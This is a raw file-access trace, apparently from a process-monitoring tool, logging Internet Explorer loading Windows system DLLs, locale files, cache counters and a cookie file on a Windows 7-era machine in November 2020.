11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\pt-BR
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\pt-BR
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\pt-BR
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\ntdll.dll
11/3/2020 - 11:45:46.43Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\ntdll.dll
11/3/2020 - 11:45:46.43Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\wow64.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\wow64.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\wow64win.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\wow64win.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\wow64cpu.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\wow64cpu.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\kernel32.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\kernel32.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\kernel32.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\kernel32.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\user32.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\user32.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ntdll.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ntdll.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\apisetschema.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\apisetschema.dllapisetschema.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\KernelBase.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\KernelBase.dllKernelBase.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\locale.nls
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\locale.nls
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\iexplore.exe
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\iexplore.exe
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\msvcrt.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\msvcrt.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\api-ms-win-downlevel-advapi32-l1-1-0.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\api-ms-win-downlevel-advapi32-l1-1-0.dllapi-ms-win-downlevel-advapi32-l1-1-0.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\advapi32.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\advapi32.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\sechost.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\sechost.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\rpcrt4.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\rpcrt4.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\sspicli.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\sspicli.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\cryptbase.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\cryptbase.dllcryptbase.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\iertutil.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\iertutil.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\api-ms-win-downlevel-version-l1-1-0.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\api-ms-win-downlevel-version-l1-1-0.dllapi-ms-win-downlevel-version-l1-1-0.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\version.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\version.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\api-ms-win-downlevel-user32-l1-1-0.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\api-ms-win-downlevel-user32-l1-1-0.dllapi-ms-win-downlevel-user32-l1-1-0.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\user32.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\user32.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\gdi32.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\gdi32.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\lpk.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\lpk.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\usp10.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\usp10.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\api-ms-win-downlevel-normaliz-l1-1-0.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\api-ms-win-downlevel-normaliz-l1-1-0.dllapi-ms-win-downlevel-normaliz-l1-1-0.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\normaliz.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\normaliz.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\api-ms-win-downlevel-shlwapi-l1-1-0.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\api-ms-win-downlevel-shlwapi-l1-1-0.dllapi-ms-win-downlevel-shlwapi-l1-1-0.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\shlwapi.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\shlwapi.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\imm32.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\imm32.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\msctf.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\msctf.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\Globalization\Sorting\SortDefault.nls
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\Globalization\Sorting\SortDefault.nlsSortDefault.nls
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\api-ms-win-downlevel-shell32-l1-1-0.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\api-ms-win-downlevel-shell32-l1-1-0.dllapi-ms-win-downlevel-shell32-l1-1-0.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\shell32.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\shell32.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ole32.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ole32.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\oleaut32.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\oleaut32.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\comctl32.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\comctl32.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\WindowsShell.Manifest
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\WindowsShell.ManifestWindowsShell.Manifest
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\IEShims.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\IEShims.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\comdlg32.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\comdlg32.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\api-ms-win-downlevel-ole32-l1-1-0.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\api-ms-win-downlevel-ole32-l1-1-0.dllapi-ms-win-downlevel-ole32-l1-1-0.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\uxtheme.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\uxtheme.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\wininet.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\wininet.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\userenv.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\userenv.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\profapi.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\profapi.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\secur32.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\secur32.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\api-ms-win-downlevel-advapi32-l2-1-0.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\api-ms-win-downlevel-advapi32-l2-1-0.dllapi-ms-win-downlevel-advapi32-l2-1-0.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\urlmon.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\urlmon.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ws2_32.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ws2_32.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\nsi.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\nsi.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\winhttp.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\winhttp.dll
11/3/2020 - 11:45:46.59Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\webio.dll
11/3/2020 - 11:45:46.59Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\webio.dll
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\mswsock.dll
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\mswsock.dll
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\wship6.dll
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\wship6.dll
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\IPHLPAPI.DLL
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\IPHLPAPI.DLL
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\winnsi.dll
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\winnsi.dll
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\cryptsp.dll
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\cryptsp.dll
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\rsaenh.dll
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\rsaenh.dll
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\RpcRtRemote.dll
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\RpcRtRemote.dllRpcRtRemote.dll
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\clbcatq.dll
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\clbcatq.dll
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\ieproxy.dll
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\ieproxy.dll
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\api-ms-win-downlevel-shlwapi-l2-1-0.dll
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\api-ms-win-downlevel-shlwapi-l2-1-0.dllapi-ms-win-downlevel-shlwapi-l2-1-0.dll
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\dwmapi.dll
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\dwmapi.dll
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\sqmapi.dll
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\sqmapi.dll
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\bcrypt.dll
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\bcrypt.dll
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\bcryptprimitives.dll
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\bcryptprimitives.dllbcryptprimitives.dll
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\mshtml.dll
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\mshtml.dll
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\d2d1.dll
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\d2d1.dll
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\DWrite.dll
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\DWrite.dll
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\dxgi.dll
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\dxgi.dll
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\setupapi.dll
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\setupapi.dll
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\cfgmgr32.dll
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\cfgmgr32.dll
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\devobj.dll
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\devobj.dll
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\wintrust.dll
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\wintrust.dll
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\crypt32.dll
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\crypt32.dll
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\msasn1.dll
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\msasn1.dll
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\apphelp.dll
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\apphelp.dll
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\mlang.dll
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\mlang.dll
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\propsys.dll
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\propsys.dll
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\dnsapi.dll
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\dnsapi.dll
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\8CS2PRM4.txt
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\8CS2PRM4.txt
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\WSHTCPIP.DLL
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\WSHTCPIP.DLL
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\rasadhlp.dll
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\rasadhlp.dll
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\FWPUCLNT.DLL
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\FWPUCLNT.DLL
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieui.dll
